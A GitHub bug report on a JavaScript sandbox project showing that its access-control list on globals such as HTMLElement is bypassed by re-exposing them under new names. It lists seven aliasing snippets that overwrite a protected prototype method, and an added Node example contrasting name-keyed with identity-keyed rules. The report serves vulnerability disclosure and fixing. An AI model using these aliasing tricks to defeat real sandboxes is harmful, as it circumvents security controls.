[demo][acl] ACL can be skipped by cloning global objects #210

Closed
t2ym opened this issue Jan 8, 2018 · 0 comments

Root Cause

Assignment of a new global object cancels the ACL for the same object.

Example Reproducible Code

  window.HTMLElement2 = HTMLElement;
  HTMLElement2.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.defineProperty(window, 'HTMLElement3', { value: HTMLElement });
  HTMLElement3.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.defineProperty(window, 'HTMLElement4', { get: function () { return HTMLElement; } });
  HTMLElement4.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  window.__defineGetter__('HTMLElement5', function () { return HTMLElement; });
  HTMLElement5.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.assign(window, { 'HTMLElement6': HTMLElement });
  HTMLElement6.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.defineProperties(window, { 'HTMLElement7': { get: function () { return HTMLElement; } } });
  HTMLElement7.prototype.click = null; // ACL for HTMLElement.prototype is bypassed
  Object.defineProperties(window, { 'HTMLElement8': { value: HTMLElement } });
  HTMLElement8.prototype.click = null; // ACL for HTMLElement.prototype is bypassed

Possible Quick Fix

Add ACL to avoid cloning global objects with their own ACLs

Note:

ACL can be hardened to avoid such situations by applying multiple ACLs for the same object. More research required.
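
The following is an added example, not code from this project or from the issue author. It models the root cause with a name-keyed ACL and contrasts it with an identity-keyed lookup as one possible hardening direction. `FakeElement`, `fakeWindow`, both ACL tables and the default-allow behaviour for unlisted names are assumptions constructed for illustration so the code runs in Node.

```javascript
// Constructed stand-in for HTMLElement so the example runs outside a browser.
class FakeElement { click() { return 'clicked'; } }

// Assumed model A: rules keyed by global name; unlisted names fall through to allow.
const nameAcl = new Map([['FakeElement', { writePrototype: false }]]);
function allowedByName(name) {
  const rule = nameAcl.get(name);
  return rule ? rule.writePrototype : true;
}

// Assumed model B: rules keyed by object identity, so every alias resolves
// to the rule of the object it actually points at.
const identityAcl = new WeakMap([[FakeElement, { writePrototype: false }]]);
function allowedByIdentity(globalObj, name) {
  const rule = identityAcl.get(globalObj[name]); // reading also runs getters
  return rule ? rule.writePrototype : true;
}

// The seven aliasing forms listed in the issue, applied to a fake global object.
const aliasForms = {
  assignment: (g, n, v) => { g[n] = v; },
  definePropertyValue: (g, n, v) => Object.defineProperty(g, n, { value: v }),
  definePropertyGetter: (g, n, v) => Object.defineProperty(g, n, { get() { return v; } }),
  defineGetter: (g, n, v) => g.__defineGetter__(n, () => v),
  objectAssign: (g, n, v) => Object.assign(g, { [n]: v }),
  definePropertiesGetter: (g, n, v) => Object.defineProperties(g, { [n]: { get() { return v; } } }),
  definePropertiesValue: (g, n, v) => Object.defineProperties(g, { [n]: { value: v } }),
};

// For each form, report whether a prototype write through the alias is allowed.
function evaluateAliases() {
  return Object.entries(aliasForms).map(([form, install]) => {
    const fakeWindow = { FakeElement }; // constructed stand-in for window
    install(fakeWindow, 'Alias', FakeElement);
    return {
      form,
      byName: allowedByName('Alias'),
      byIdentity: allowedByIdentity(fakeWindow, 'Alias'),
    };
  });
}

console.table(evaluateAliases());
```

In this model every alias form is allowed under the name-keyed table and denied under the identity-keyed one, which makes the seven forms a convenient regression list for any ACL change.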
